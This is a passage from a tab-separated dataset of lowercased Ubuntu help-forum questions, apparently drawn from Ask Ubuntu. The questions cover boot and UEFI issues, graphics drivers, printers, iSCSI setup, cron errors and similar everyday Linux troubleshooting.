will solve the screen not showing anything , even in cli mode ( f1 ) edit : have tried the following without result : installing the driver downloaded from nvidia : result- > no working screens at all . webupd8 : result - > no working screens either .
418232	spidev control using external hardware requirements	my first post , so i hope it 's in the correct place for a answer to this question.. i have been playing with spi inputs using rpi . this device give me spidev0,0 and spidev0,1 , if i do a ls /dev and i can connect electronics to the header pins via a 3008 slave ic . i would like to also add a spi device to my installation of ubuntu 12.04lts is this possible ? what device would be required ? ( i guess a usb to spi ) would this board then give me spidev0,0 and spidev0,1 ( via ls /dev ) the same as the rpi so i can control the spi with python ( as i do now and the same way i do now just externally plugged into my pc ) help or any information appreciated .
418234	does hpcoolsense work in ubuntu ?	before i changed to ubuntu , i had hp coolsense on my friends windows 7 laptop . is it still working on my pc or do i need to get other software ? also i 've seen a closed thread about this but it had no answer . does hpcoolsense still work when i 've switched to ubuntu ?
418235	ipod nano 7 - anybody able to get one working ?	last weekend i bought a 7th generation ipod nano to replace my ( now dead ) 3rd generation ipod nano . however , i can not get this new ipod nano to work* . previously , i was using banshee to manage my 3rd generation ipod nano , but banshee does n't seem to work with the 7th generation one . is there anybody out there who has successfully managed to get a 7th generation ipod nano to work on their ubuntu platform ? the 7th generation ipod nano came out in october 2012 - there must be someone out there who 's managed to get the damned thing to work ( ? ) . *using banshee i can see that the ipod nano mounts correctly and it is visible in the banshee screen . however , i am then unable to transfer any music onto it . i drag and drop music files just like i did before and although the banshee screen gives the impression that the music has transferred correctly when i then go to try and use the ipod nano the music is n't actually there .
418237	how to detect error in cron jobs	the reasons why a cron job may fail is really very large . most common reasons may be , syntax error using executable without proper path using a shell variable which is not defined in cron environment attempt to open a gui without specifying display and so on ... sometimes it is really difficult to understand which error is preventing the job to be executed . is there a way to detect error ( s ) in a cron jobs ?
418239	ca n't boot windows 8 after installing ubuntu 13.10 in legacy mode	i just installed ubuntu 13.10 in legacy mode ( secure boot disabled ) next to a windows 8.1 partition . ubuntu works perfectly ( in uefi and in legacy modes ) but i ca n't load windows anymore - there is no windows entry in the grub boot choices . when the secure boot is enabled , i ca n't load ubuntu anymore ( 'no bootable devices ' ) . i 've tried to repair the system with boot repair , but nothing changed . any help appreciated ! thanks ( my machine is a dell xps13 )
418246	ubuntu on an asus eee pc 4g ( 701 )	i 'm a new user to ubuntu , but having installed it on my main laptop i found that i really like the ui and the usability . i have an asus eee pc 4g that 's been sitting spare for a few years now and would love to be able to get ubuntu installed on it but i 'm unsure on what distro to pick for it as when i tried with the same version i put on my main laptop it came up with a cpu compatibility error . so any help is really appreciated .
418247	install xfce from a flash drive ?	i was running xubuntu but accidently deleted xfce files . now xubuntu wo n't start ( i have no gui ! ) . is it possible to download xubuntu to a flash drive and copy it over to my machine ? if so what command would i use , from the terminal , to run the flash drive program ?
418248	everything is missing !	i 've installed some not very good software . and now terminal is missing . doing ctrl + alt + t does nothing . no left or top bar . there is nothing but the desktop . that 's all . software center is also missing so my ubuntu is ruined . also i do n't want to reinstall ubuntu then reinstall all my software .
418249	how to optimize an under-powered laptop for video	i have an old laptop that i installed ubuntu 12.04 on for a family member . it 's an hp xt3000 with 748mib ram and 60gb disk . i had to install with non-pae support and nomodeset if that 's relevant . everything seems to be working fine with unity 2d , although a bit sluggish to launch applications ( probably need more ram ? ) . the main show-stopper is youtube video performance with is very choppy . any thoughts whether additional ram will fix this too , or would he proprietary fglrx drivers be a better bet ?
418251	recover data from partitions ( changed only mount point )	i was installing ubuntu in my machine.. it was not reading my other partitions ( though they were working perfectly in windows ) .. i tried assigning a mount point to each partition . now i am unable to read the data from the partitions either with ubuntu or windows.. it shows the space utilized and all stuff correctly but no data is visible.. how do i recover my data ? ? is there an easy way to do this ? ? please help..
418252	ca n't access beaglebone through ssh after changing network settings . need a way to recover or correct the problem	beaglebone is connected through ethernet . trying to enable wireless connectivity as well , after plugging a wifi usb dongle . minihdmi port is remapped so can not be used . the only way to access the beaglebone is through ssh . for some reason that i can not understand ( greatly appreciated if you explain that to me ) , after changing the /etc/network/interfaces from : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp to : auto lo iface lo inet loopback auto eth0 iface eth0 inet dhcp auto wlan0 iface wlan0 inet dhcp # static i can not ssh to my beaglebone anymore . i can see from a computer connected to the same network ( through arp -a ) as well from my router configuration page , that the beaglebone never gets an ip from any of the two interfaces . any ideas on why this is happening and how can i fix it ?
418254	need os x shortcuts / settings	tldr i 'm used to working with os x on apple computers . i need os x key bindings / keyboard shortcuts , two finger scrolling and the trackpad of this device to not respond to my hands resting on the keyboard ... any mac users who have successfully made the switch to ubuntu without going insane , please help . ldr i just installed ubuntu on an asus laptop and there are a few things driving me insane : the trackpad on this laptop is located where my hands normally rest ... so while i 'm typing in order to keep focus on the thing i 'm typing i have to essentially hover above the keyboard . i need to fix this problem . how do ? i do n't even know how to phrase that in a way that makes googling the answer possibwle . i need the alt key on this computer to serve the function of the command key on a mac . i need os x key bindings . thankfully the alt + tab command functions the same way as the app switcher on a mac but ... i need to be able to hit alt + spacebar and have it launch the ubuntu equivalent of spotlight . i do not know how to scroll on this computer . there is no scroll thing on the trackpad . is there a way to turn enable this trackpad to be a multi-finger recognizing trackpad ? i 've tried : this post and the posts he mentions . pommed is running but it does n't seem like it 's doing anything . a lot of these problems i have n't been able to solve because i do n't know the correct phrasing or terminology to get relevant search results in google or even here.i feel like there has to have been someone in the history of ubuntu who came from a mac environment and made ubuntu feel like os x .
418255	program writes .conf file - cant find the file to edit	i 'm running a cgminer ( sgminer ) on xubuntu 12.04 . once in the miner i press ( s ) and ( w ) to create a default sgminer.conf in a default location : /home/user/.sgminer/.sgminer.conf/ . but i am unable to find the file in that location to edit ( i want to change the default settings ) . i installed a search app but that has not worked . i get an error when i try to save a .conf file to different location . when i start the miner it tells me it is using the default .conf file from the default location even though it does n't appear to be in that folder . fairly new to linux . i 'm mining as an exercise to learn about linux and computers in general . please help point me in the right direction ! edit : error simply reads `` can not open or create file ''
418258	13.10 install on hp mini 2133	i wanted to install 13.10 on my hp mini 2133 , but main problem is that screen resolution during installation is not optimal for hp mini 2133 , and therefore all dialogs are too big , so i can not see buttons area : back , next.. even windows can not be resized less . is there any possibility to change installation screen resolution , maybe some boot parameters ? note : i am installing it from usb disk , bootable made in yumi . thanks for help .
418259	black screen after login after update ( intel gpu )	first , please do not mark this as duplicate . i have spent two days going through this website trying different things suggested . i have 13.10 and using a dell inspiron mini 1018 that has the following graphics : sangie @ sangie-netbook : /tmp $ sudo lshw -c video *-display:0 unclaimed description : vga compatible controller product : atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller vendor : intel corporation physical id : 2 bus info : pci @ 0000:00:02.0 version : 00 width : 32 bits clock : 33mhz capabilities : msi pm vga_controller bus_master cap_list configuration : latency=0 resources : memory : f0200000-f027ffff ioport:18d0 ( size=8 ) memory : d0000000-dfffffff memory : f0000000-f00fffff *-display:1 unclaimed description : display controller product : atom processor d4xx/d5xx/n4xx/n5xx integrated graphics controller vendor : intel corporation physical id : 2.1 bus info : pci @ 0000:00:02.1 version : 00 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list configuration : latency=0 resources : memory : f0280000-f02fffff i have my drive encrypted , if that matters , and after i unlock it and the system starts to boot , i see a black screen but the backlight is on and adjustments to brightness does n't help . please note that i have auto-login enabled so login screens never come up . i 've tried booting to older kernels and even tried 3.9 with no help . the only way i can boot is to use nomodeset or recovery mode , but then i 'm stuck at 800 x 600 resolution with no way to change it . my system has been working fine for months and i 'm pretty sure i updated the base right before this happened . the full resolution is 1366 x 600 ( i believe ) so 800 x 600 makes everything stretched . any help with this would be greatly appreciated . other things i 've tried : using intel 's driver installer and running that and letting it install it 's own drivers.. issue persisted . running system update again to the point where there 's no more updates available . trying to boot to previous kernels in grub sudo apt-get update
418263	not able to go to any sites after a few minutes	so , on our machine we bought to host our server ... we can load pages for a few minutes , however after starting all of our minecraft servers we can not load any pages at all ( including wgeting files off of http servers ) which is a problem because when bukkit gets files from websites the connection times out and it crashes due to the wait time . if anyone has a solution it would be greatly appreciated . we use ubuntu server 12.04.4 lts
418267	md0 iscsi share target	i semi followed the following : http : //www.server-world.info/en/note ? os=ubuntu_13.04 & p=iscsi current /etc/default/iscsitarget iscsitarget_enable=true # ietd options # see ietd ( 8 ) for details iscsitarget_options= '' '' # add at the last # naming rule : [ iqn.yaer-month.domain : any name ] target iqn.2014-02.michael.server.dynamic.ziggo.nl : md0 # provided devicce as a iscsi target lun 0 path=/dev/md0 , type=blockio # iscsi initiator 's ip address you allow to connect initiator-address 192.168.1.121 # authentication info ( set anyone you like for `` username '' , `` password '' ) incominguser username password # alias # alias md0 ... ... ... ... ... .. root @ nas01 : ~ # aptitude -y install iscsitarget iscsitarget-dkms root @ nas01 : ~ # vi /etc/default/iscsitarget # change iscsitarget_enable=true root @ nas01 : ~ # vi /etc/iet/ietd.conf # add at the last # naming rule : [ iqn.yaer-month.domain : any name ] target iqn.2013-05.world.server : target00 # provided devicce as a iscsi target lun 0 path=/dev/vg_target00/lv_target00 , type=blockio # iscsi initiator 's ip address you allow to connect initiator-address 10.0.0.60 # authentication info ( set anyone you like for `` username '' , `` password '' ) incominguser username password root @ nas01 : ~ # /etc/init.d/iscsitarget restart * removing iscsi enterprise target devices : ... done . * starting iscsi enterprise target service ... done . ... done . and ... root @ michael-server : ~ # /etc/init.d/iscsitarget restart /etc/init.d/iscsitarget : 10 : /etc/default/iscsitarget : target : not found /etc/init.d/iscsitarget : 12 : /etc/default/iscsitarget : lun : not found /etc/init.d/iscsitarget : 14 : /etc/default/iscsitarget : initiator-address : not found /etc/init.d/iscsitarget : 16 : /etc/default/iscsitarget : incominguser : not found * removing iscsi enterprise target devices : [ ok ] * stopping iscsi enterprise target service : [ ok ] * removing iscsi enterprise target modules : [ ok ] * starting iscsi enterprise target service [ ok ] [ ok ] root @ michael-server : ~ # what do i want ? well i have a raid 5 array ( md0 ) wich i have mounted as to ext4 file system as /mnt/raid my idea is to have several vm 's to run several features ( q2 : if i change hte 192.168.x.x to 0.0.0.0 would i allow all to connect to the iscsi share ? as i want multiple vm 's to connect to the same share ... ( quite likely 2 , maybe 3 )
418268	how to fix `` no boot media found '' on dual disk setup after uefi ubuntu installation ?	i have desktop with asrock 990fx with two ssd disks . the first disk is used for windows 8.1 , the second disk i would like to use for ubuntu . i did boot a usb stick as uefi , installation passed successfully and after reboot i get : no boot media found regression : i 've also tried to install ubuntu 12.04 lts . i do press f11 during desktop startup in order to choose boot device . i can boot usb stick in uefi mode . i see it in options . ubuntu reports that it was been installed on separate hdd . i do reboot and ... see insert boot media . i try to boot as default ( ubuntu hdd goes first in boot list ) . no luck . i try to boot from ubuntu hdd using special menu ( f11 ) . no luck . it 's impossible to boot windows 8.1 by selecting it 's hdd in the list . i have special menu item `` windows boot manager '' . if i click on it , it runs . looks like ubuntu should have a similar menu item , but it does n't . what do i do wrong ?
418269	do i need to disconnect an external hard drive before installing unbuntu ?	i backed up my data to an external hd . do i need to disconnect the drive before installing ubuntu ?
418273	very bad fps on dota 2 with ubuntu 13.10 using hd7770	i am having very bad fps on dota 2 native . i am using : ubuntu 13.10 for x64 bit systems amd fx-6300 cpu 8gb ddr3 - 1600mhz radeon 7770 ghz edition with 14.1 beta drivers what i have tried up so far : ubuntu 12.04 lts - same problem amd 13.12 catalyst - same problem source drivers - same problem proprietary drivers provided by ubuntu - steam wo n't launch is it possible to help to helm me out with this very troublesome problem . this is the only game that i do play in my free time on the pc . regards , p. mihai
418277	ca n't install 13.10 64-bit on virtualbox	i have a dell latitude laptop e6530 with win 7 enterprise 64-bit with virtualization support enabled . i do not have tpm enabled . i 've installed virtualbox 4.3.6 . when i try to install ubuntu 13.10 desktop 64-bit i get this error : this kernel requires an x86-64 cpu , but only detected an i686 cpu . unable to boot - please use a kernel appropriate for your cpu . virtualization is working on this hardware and host os because i use the hax hardware accelerator for android emulation on it . will enabling tpm solve this problem , or do i need another linux distro ?
418281	kernel killing java process	we have three ubuntu 12.04 boxes that are load balanced behind nginx . we originally installed tomcat7 using apt-get but ran into an issue where i believe the kernel is killing the java process due to oom . i switched to the latest tomcat7 distribution and installed it manually . same result . we have a swap file enabled . i originally had swapiness set to 0 per hosted provider 's recommendation . i switched to swapiness of 60 . it looks like it is still happening . here is what i see in the syslog : feb 8 06:35:38 processor1 kernel : [ 658920.280798 ] select 1 ( init ) , adj 0 , size 371 , to kill feb 8 06:35:38 processor1 kernel : [ 658920.280813 ] select 425 ( rsyslogd ) , adj 0 , size 497 , to kill feb 8 06:35:38 processor1 kernel : [ 658920.280827 ] select 18905 ( bash ) , adj 0 , size 1568 , to kill feb 8 06:35:38 processor1 kernel : [ 658920.280831 ] select 28556 ( java ) , adj 0 , size 63276 , to kill feb 8 06:35:38 processor1 kernel : [ 658920.280837 ] send sigkill to 28556 ( java ) , adj 0 , size 63276 system info : 512mb ram 512mb swapfile enabled . openjdk runtime environment ( icedtea 2.4.4 ) ( 7u51-2.4.4-0ubuntu0.12.04.2 ) openjdk 64-bit server vm ( build 24.45-b08 , mixed mode ) apache-tomcat-7.0.50 java memory set with -xmx64m i can see memory usage going up and down with the java process . i see garbage collection happening . i will monitor usage and see ram drop to < 5mb and a garbage collection will happen returning memory back up to greater than 100mb free . no errors occuring in tomcat7 . the process is just killed at least once a day by the linux kernel .
418288	bumblebee nvidia geforce gt 750m	i have tried various ways to get bumblebee running on a fresh ubuntu 13.10 install with all the updates . however i seem to be having trouble getting it to work at all . i have followed the instructions here : https : //wiki.ubuntu.com/bumblebee # installation . this has been immediately after installing restricted extras , vlc , chrome and allowing ubuntu to update . nothing else was changed . any ideas appreceated . got an acer aspire v5-573g intel core i5-4200u nvidia geforce gt 750m some problems i got fixed ( like changing the busid to 01:00.0 . this is my /etc/bumblebee/bumblebee.conf # configuration file for bumblebee . values should **not** be put between quotes # # server options . any change made in this section will need a server restart # to take effect . [ bumblebeed ] # the secondary xorg server display number virtualdisplay=:8 # should the unused xorg server be kept running ? set this to true if waiting # for x to be ready is too long and do n't need power management at all . keepunusedxserver=false # the name of the bumbleblee server group name ( gid name ) servergroup=bumblebee # card power state at exit . set to false if the card shoud be on when bumblebee # server exits . turncardoffatexit=false # the default behavior of '-f ' option on optirun . if set to `` true '' , '-f ' will # be ignored . noecomodeoverride=false # the driver used by bumblebee server . if this value is not set ( or empty ) , # auto-detection is performed . the available drivers are nvidia and nouveau # ( see also the driver-specific sections below ) driver=nvidia # directory with a dummy config file to pass as a -configdir to secondary x xorgconfdir=/etc/bumblebee/xorg.conf.d # # client options . will take effect on the next optirun executed . [ optirun ] # acceleration/ rendering bridge , possible values are auto , virtualgl and # primus . bridge=auto # the method used for virtualgl to transport frames between x servers . # possible values are proxy , jpeg , rgb , xv and yuv . vgltransport=proxy # list of paths which are searched for the primus libgl.so.1 when using # the primus bridge primuslibrarypath=/usr/lib/x86_64-linux-gnu/primus : /usr/lib/i386-linux-gnu/primus # should the program run under optirun even if bumblebee server or nvidia card # is not available ? allowfallbacktoigc=false # driver-specific settings are grouped under [ driver-name ] . the sections are # parsed if the driver setting in [ bumblebeed ] is set to name ( or if auto- # detection resolves to name ) . # pmmethod : method to use for saving power by disabling the nvidia card , valid # values are : auto - automatically detect which pm method to use # bbswitch - new in bb 3 , recommended if available # switcheroo - vga_switcheroo method , use at your own risk # none - disable pm completely # https : //github.com/bumblebee-project/bumblebee/wiki/comparison-of-pm-methods # # section with nvidia driver specific options , only parsed if driver=nvidia [ driver-nvidia ] # module name to load , defaults to driver if empty or unset kerneldriver=nvidia-319-updates pmmethod=auto # colon-separated path to the nvidia libraries librarypath=/usr/lib/nvidia-319-updates : /usr/lib32/nvidia-319-updates # comma-separated path of the directory containing nvidia_drv.so and the # default xorg modules path xorgmodulepath=/usr/lib/nvidia-319-updates/xorg , /usr/lib/xorg/modules xorgconffile=/etc/bumblebee/xorg.conf.nvidia # # section with nouveau driver specific options , only parsed if driver=nouveau [ driver-nouveau ] kerneldriver=nouveau pmmethod=auto xorgconffile=/etc/bumblebee/xorg.conf.nouveau here is the xorg.conf.nvidia section `` serverlayout '' identifier `` layout0 '' option `` autoadddevices '' `` false '' option `` autoaddgpu '' `` false '' endsection section `` device '' identifier `` discretenvidia '' driver `` nvidia '' vendorname `` nvidia corporation '' # if the x server does not automatically detect your vga device , # you can manually set it here . # to get the busid prop , run `lspci | egrep 'vga|3d'` and input the data # as you see in the commented example . # this setting may be needed in some platforms with more than one # nvidia card , which may confuse the proprietary driver ( e.g. , # trying to take ownership of the wrong device ) . also needed on ubuntu 13.04 . busid `` pci:01:00.0 '' # setting probeallgpus to false prevents the new proprietary driver # instance spawned to try to control the integrated graphics card , # which is already being managed outside bumblebee . # this option does n't hurt and it is required on platforms running # more than one nvidia graphics card with the proprietary driver . # ( e.g . macbook pro pre-2010 with nvidia 9400m + 9600m gt ) . # if this option is not set , the new xorg may blacken the screen and # render it unusable ( unless you have some way to run killall xorg ) . option `` probeallgpus '' `` false '' option `` nologo '' `` true '' option `` useedid '' `` false '' option `` usedisplaydevice '' `` none '' endsection this is my output if i try using optirun : vytautas @ vytautas-laptop : ~ $ optirun glxgears [ 1861.794624 ] [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . [ 1861.794679 ] [ error ] aborting because fallback start is disabled . and finally these are the last lines of my kernel.log feb 8 22:43:49 vytautas-laptop kernel : [ 584.014406 ] bbswitch : version 0.8 feb 8 22:43:49 vytautas-laptop kernel : [ 584.014414 ] bbswitch : found integrated vga device 0000:00:02.0 : \_sb_.pci0.gfx0 feb 8 22:43:49 vytautas-laptop kernel : [ 584.014421 ] bbswitch : found discrete vga device 0000:01:00.0 : \_sb_.pci0.rp05.pxsx feb 8 22:43:49 vytautas-laptop kernel : [ 584.014433 ] bbswitch : failed to evaluate \_sb_.pci0.rp05.pxsx._dsm { 0xf8,0xd8,0x86,0xa4,0xda,0x0b,0x1b,0x47,0xa7,0x2b,0x60,0x42,0xa6,0xb5,0xbe,0xe0 } 0x100 0x0 { 0x00,0x00,0x00,0x00 } : ae_not_found feb 8 22:43:49 vytautas-laptop kernel : [ 584.014440 ] bbswitch : failed to evaluate \_sb_.pci0.rp05.pxsx._dsm { 0xa0,0xa0,0x95,0x9d,0x60,0x00,0x48,0x4d,0xb3,0x4d,0x7e,0x5f,0xea,0x12,0x9f,0xd4 } 0x102 0x0 { 0x00,0x00,0x00,0x00 } : ae_not_found feb 8 22:43:49 vytautas-laptop kernel : [ 584.014447 ] acpi warning : \_sb_.pci0.gfx0._dsm : argument # 4 type mismatch - found [ buffer ] , acpi requires [ package ] ( 20130517/nsarguments-95 ) feb 8 22:43:49 vytautas-laptop kernel : [ 584.014488 ] bbswitch : no suitable _dsm call found . also , as a side note even though i made sure i got the drivers installed through the apt i get this : vytautas @ vytautas-laptop : ~ $ sudo nvidia-xconfig sudo : nvidia-xconfig : command not found thank you
418292	dual boot with windows 8.1 on toshiba sattelite	i am trying to install ubuntu 13.10 as a dual boot on a laptop with pre-installed windows 8.1 after learning how to disable secure boot and switch from uefi boot to csm boot i managed to boot ubuntu from a usb drive and go through the installation . but when i try to boot the machine from the hard drive it either boots windows 8.1 ( when uefi boot and secure boot are turned on ) , or just hangs , seemingly trying to boot from ethernet . i then tried lubuntu 13.10 , and it did install in the csm mode . now my laptop boots lubuntu when in csm mode and windows when in the uefi . another detail : when i go through the installation ubuntu does not notice windows 8.1 at all , so i have to choose `` something else '' option to avoid erasing windows . the laptop is toshiba p55-a5312 , and the bios is american megatrends with aptio setup utility . i 'll really appreciate your help after spending many hours on reading bits and pieces on the net and trying every variation i could think of . thanks a lot . another data point : i also tried to install ubuntu 12.04 , mint 16 and fedora 20 with similar success rate . for extra info here is the output of the 'parted ' command in lubuntu : model : ata toshiba mq01abd0 ( scsi ) disk /dev/sda : 750gb sector size ( logical/physical ) : 512b/512b partition table : gpt number start end size file system name flags 1 1049kb 1075mb 1074mb ntfs basic data partition hidden , diag 2 1075mb 1180mb 105mb fat32 basic data partition boot 3 1180mb 1314mb 134mb ntfs basic data partition msftres 4 1314mb 373gb 372gb ntfs basic data partition msftdata 6 373gb 673gb 300gb ext4 7 673gb 683gb 10.0gb bios_grub 8 683gb 703gb 20.0gb linux-swap ( v1 ) 5 741gb 750gb 9572mb ntfs basic data partition hidden , diag
418295	chrome wo n't start from the launcher	ubuntu 13.10 64-bit , chrome 64-bit . i can start chrome from the command line with `` google-chrome-stable '' and lock it to the launcher . when i try to launch chrome from the launcher nothing happens . i can always start it from the command line . what do i have to do to make the launcher work with chrome ?
418296	fastest way to reload graphics driver module ?	i am trying to get my way around on graphics driver development , in this case for modifications on a drm kernel module , called gma500_gfx . every time when i have made a change to this driver , i start a script which compiles and replaces the previous kernel module ( by a cp command ) , and restarts the linux distro ( lubuntu ) . i am unable to reload this graphics driver module without restarting linux ( yet ) . the commands modprobe and rmmod always give me a 'module in use ' error . modprobe gma500_gfx -r modprobe : fatal : module gma500_gfx is in use . when i look at the dependencies i get the following list . gma500_gfx 185579 2 drm_kms_helper 48716 1 gma500_gfx drm 298219 3 drm_kms_helper , gma500_gfx video 19370 2 acer_wmi , gma500_gfx i2c_algo_bit 13413 1 gma500_gfx i am also unable to unload any of these dependencies , which give the same error . other things that i have tried before the modprobe , but which are unsuccesful : go to a single user environment by `` init 1 '' shutdown lightdm by `` /etc/init.d/lightdm stop '' ( which reduces the refcount by 1 to 1 ) does anybody know a faster way to reload the graphics driver module than restarting the linux distribution ?
418298	ca n't boot ubuntu from hard disk , only from usb	i followed the instructions on : installing ubuntu on a pre-installed windows 8 ( 64-bit ) system ( uefi supported ) but now i can only boot from the usb drive and it asks me if i want to reinstall ubuntu every time . here 's my boot-repair log : http : //paste.ubuntu.com/6899672 i think i have some problems with where my linux boot option is loaded . any suggestions ?
418299	ca n't delete a printer - how do i access the printing dialog with admin privileges ?	i am running ubuntu 12.04 . when i access the `` printing '' menu ( system settings / printing ) , and right-mouse-click on a printer , a number of options are disabled ( rename , delete ) . do i have to somehow access that screen with sudo and how ?
418303	my download of ubuntu 32bit isnt an iso image ?	im trying to make a bootable cd so i read the instructions and it seems straight forward . the only problem is that after downloading the files for the main site.. they seem to not be an iso file so i ca n't burn them to a disc . can someone please elaborate on how to make the correct iso file i need . please and thanks the download file contains ... .disk boot casper dists install isolinux pics pool preseed autorun.inf md5sum.txt readme ... wubi.exe also another question.. if ive already got my laptop asking for the windows install cd everytime i start up.. will it allow this cd to boot ?
418304	recent error - usb speakers not recognised 12.04	up until a few days ago , i 've been able to play my audio via a usb wireless audio kit ( nikkai ) . but this has suddenly stopped working . in sound settings the usb speaker output option is showing up with a screen icon with a red crossed circle ( the traffic sign ) through it and the test speakers option is n't playing anything . i 've tried sudo apt-get upgrade and ..update too no effect and checked the usb ports , which are active . have also tried removing usb & unplugging its base station that 's connected to speaker system . none of this has made any difference . i ca n't see what 's changed to stop the usb audio from working , as they were playing music great a few days ago the last time i tried them . i ca n't interpret it but i see others with similar issues have posted lsusb & dmesg | tail outputs so here goes : lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 010 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 011 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 004 device 002 : id 046d : c018 logitech , inc. optical wheel mouse bus 005 device 002 : id 0c45:1db9 microdia & dmesg | tail : [ 1960.138367 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 1960.138374 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 1960.142363 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 1960.142371 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 1960.143388 ] sdb : sdb1 [ 1960.145856 ] sd 6:0:0:0 : [ sdb ] no caching mode page found [ 1960.145863 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through [ 1960.145869 ] sd 6:0:0:0 : [ sdb ] attached scsi removable disk [ 2121.160674 ] sdb : detected capacity change from 2038431744 to 0 [ 2125.103785 ] usb 2-4 : usb disconnect , device number 4
418306	will there be future support for the pepper version of flashplugin for firefox ?	i have both firefox and chromium installed , the latter with the pepperflashplugin enabled . some sites no longer support the 11.2 version of flash which is all i can get for firefox . is there at least talk of supporting pepper support for firefox ? i hate to think i wo n't be able to use firefox any more .
418308	squirrelmail unable to send / receive mail	i am configuring my own mail server for my domain after installing dovecot , postfix and squirrelmail i am stuck again . this time when i try to sendmail to an outside e-mail address i get this error : requested action not taken : mailbox unavailable 550 5.1.1 < xxxx @ gmail.com > : recipient address rejected : gmail.com if i try to send mail to the user @ mydomain i do n't get a error but i do n't receive anything . what can be the problem , please request more details if you need some .
418309	nbcsn on ubuntu/linux	i like using nbcsn to watch live soccer matches on my laptop when on the road for business . however , i 've recently found that it does not work on ubuntu or linux in general . anyone know why or if they 're trying to get this working ? makes no sense bc i 'm using google chrome on windows and linux ... i 'm trying to make the full switch to linux = ]
418311	dependency ‘dbi’ is not available for package ‘rsqlite’ when trying to install rqda	i am trying to install rqda in ubuntu , but i am always getting the following error : error : dependency ‘dbi’ is not available for package ‘rsqlite’ * removing ‘/home/majorestre/r/x86_64-pc-linux-gnu-library/2.14/rsqlite’ warning in install.packages : installation of package ‘rsqlite’ had non-zero exit status error : dependencies ‘dbi’ , ‘rsqlite’ are not available for package ‘rqda’ * removing ‘/home/majorestre/r/x86_64-pc-linux-gnu-library/2.14/rqda’ warning in install.packages : installation of package ‘rqda’ had non-zero exit status the downloaded packages are in /tmp/rtmp5e1xys/downloaded_packages
418312	problem installing ubuntu-restricted-extras	first thing , i 'm far from a linux wiz ... based on some questions and answers around playing mp4 files , i ran sudo apt-get install ubuntu-restricted-extras . things seemed to be going fine until i got a pop up with the microsoft eula and what appeared to be an ok button at the bottom . unfortunately , the button did nothing . after waiting quite a while and trying whatever i could to accept the license , i killed the process ... probably not the smartest thing do have done ? so now can anybody give me some help in either uninstalling what is there or doing a complete install ? tia , john
418314	how do i fix black desktop after installing gnome3 ?	i recently installed gnome3 from following an omgubuntu link ( http : //www.omgubuntu.co.uk/2013/12/upgrade-gnome-3-10-ubuntu-13-10 ) and it broke my desktop . now it 's black , i ca n't access the icons , and i ca n't apply a wallpaper . it 's just dead . i followed the uninstall instructions and even installed ubuntu tweak and emptied all the junk stuff . no luck . any fix for this ? this happened to me in 13.04 and i ended up needing to completely reinstall everything and i 'm really hoping i do n't have to do this again .
418316	will it create any critical problems if one always uses ''sudo poweroff '' ?	always i have to use sudo poweroff or sudo shutdown -h now to shut down my pc because the `` shut down '' button is not working . according to this post sudo shutdown -h now is safe . but what about sudo poweroff ? moreover , would you recomend to use sudo poweroff or sudo shutdown -h now ? i 'm using 12.04 .
418328	`` connection reset by peer '' when getting sshfs to mount ?	i am trying to mount a remote directory using sshfs , but i 'm getting the connection reset by peer error : is there a solution for this ?
418331	how do i get a canon mg5550 printer to work under ubuntu 12.04 ?	my old canon printer has just died and i 've replaced it with a canon mg5550 inkjet printer . i run ubuntu 12.04 lts . i have downloaded drivers into my download file but am stuck . what do i do next ? sorry but i am one of the new breed of ignorant non-techie linux users who has escaped from windows so i need a step by step guide . so is there anyone who can spell out the commands for what i do next please ? i have the following files now in my downloads folder but what do i do next please ? /home/john/downloads/scangearmp-mg5500series-2.20-1-deb.tar.gz /home/john/downloads/cnijfilter-mg5500series-4.00-1-deb.tar.gz i unpacked these by right clicking on them . next i double clicked on the right deb file hoping to install it my system update manager gave the following error message : dependency is not satisfiable ... . so help ! i know i 'm only a few key clicks away many thanks john
418332	how do i create daemon profiler or is there a better way to do so ?	i am wondering if there is a simple way to organize daemons on my machine into multiple profiles ? for example , i would like to have multiple 'daemon profiles ' such as home server web server file server these could be running simultaneously but i would like to have the option to choose at particular time . something like this would be great because i can control the resources accordingly and not having ( for instance ) apache2 , dejadup or samba server running while i am trying to do video editing . also . i would like to create multiple separate environments ( similar to profiles ) on my computer . i read it somewhere that it is a good practice to separate its use into the following examples : work horse play box explorer this could probably create sort of like a safety net when i feel like messing around with some experimental features or feeling adventurous with my machine . hope these are not much different from each other and i think that they are pretty similar in nature . thanks in advance~ [ ubuntu 13.10 / gnome 3.10.1 ]
418333	can i overburn my cdrom with the ubuntu file ?	my cdrom has 702mb the whole iso is 731 it gives me the option to overburn the disc ? can i do this and still boot the disc successfully onto a laptop ? if not is there a file that is maybe is not needed in the ubuntu 32bit os boot download ? .
418335	`` you have installed on sda7 a linux version which is not efi-compatible ''	you have installed on sda7 a linux version which is not efi-compatible . it is probably incompatible with your computer . please install an efi-compatible system . for example linux-secure-remix-64bit and ubuntu-64bit are efi-compatible systems . this message is from the boot-repair iso that i burned to a usb in order to figure out what is wrong with my installed version of ubuntu . i know that i installed ubuntu-64bit though so why am i getting this message ? ?
418336	asus n61jq amd 5730 graphics drivers black screen	hardware : asus n61jq ati radeon hd 5730 i have managed to install the drivers using the guide on this website without any issues or errors . the issue is that every time i restart the laptop it gives me the purple screen of ubuntu then i get a black screen . i can hear ubuntu starting in the background but there is no picture whatsoever . i have reinstalled ubuntu and then installed using another guide through the terminal and same result . no errors but i get a black screen .
